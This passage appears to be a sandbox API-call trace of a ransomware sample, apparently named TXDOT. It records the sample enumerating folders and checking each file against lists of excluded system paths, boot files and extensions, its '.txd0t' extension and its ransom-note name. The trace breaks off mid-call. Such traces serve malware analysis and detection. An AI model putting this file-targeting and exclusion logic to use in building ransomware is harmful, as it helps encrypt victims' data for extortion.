StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.087] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0071.087] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0071.087] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" [0071.087] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.087] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.087] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.088] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.088] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.088] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.088] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.088] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.088] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.088] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.088] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.088] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.088] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.088] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.088] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.088] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.088] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.088] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.088] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0071.088] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0071.088] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" [0071.088] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.088] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.088] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.089] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.089] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.089] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.089] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.089] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0071.089] GetProcessHeap () returned 0xe30000 [0071.089] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.089] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0071.089] StrCmpW (psz1="1033", psz2=".") returned 1 [0071.089] StrCmpW (psz1="1033", psz2="..") returned 1 [0071.089] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.089] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.089] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1033", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system32\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\local\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\boot\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\perflogs\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\programdata\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\drivers\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\wsus\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.089] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="crypt_detect") returned 0x0 [0071.090] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="cryptolocker") returned 0x0 [0071.090] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="ransomware") returned 0x0 [0071.090] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\WINDOWS") returned 0x0 [0071.090] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.090] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files") returned 0x0 [0071.090] GetProcessHeap () returned 0xe30000 [0071.090] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.090] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0071.090] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\*") returned="C:\\588bce7c90097ed212\\1033\\*" [0071.090] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22b0 [0071.091] StrCmpW (psz1=".", psz2=".") returned 0 [0071.091] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.091] StrCmpW (psz1="..", psz2=".") returned 1 [0071.091] StrCmpW (psz1="..", psz2="..") returned 0 [0071.091] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.091] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.091] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.091] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0071.091] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0071.091] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="C:\\588bce7c90097ed212\\1033\\eula.rtf" [0071.091] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.091] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.091] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.091] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.091] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.091] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.091] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.091] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.091] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.092] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.092] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.092] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.092] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.092] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.092] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0071.092] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0071.092] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" [0071.092] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.092] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.092] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.092] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.092] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.092] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.092] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.092] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.092] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.092] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.092] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.093] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.093] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.093] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.093] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0071.093] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0071.093] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" [0071.093] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.093] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.093] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.093] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.093] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.093] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.093] FindClose (in: hFindFile=0xec22b0 | out: hFindFile=0xec22b0) returned 1 [0071.093] GetProcessHeap () returned 0xe30000 [0071.093] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.093] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1035", cAlternateFileName="")) returned 1 [0071.093] StrCmpW (psz1="1035", psz2=".") returned 1 [0071.093] StrCmpW (psz1="1035", psz2="..") returned 1 [0071.094] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.094] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.094] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1035", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system32\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\local\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", 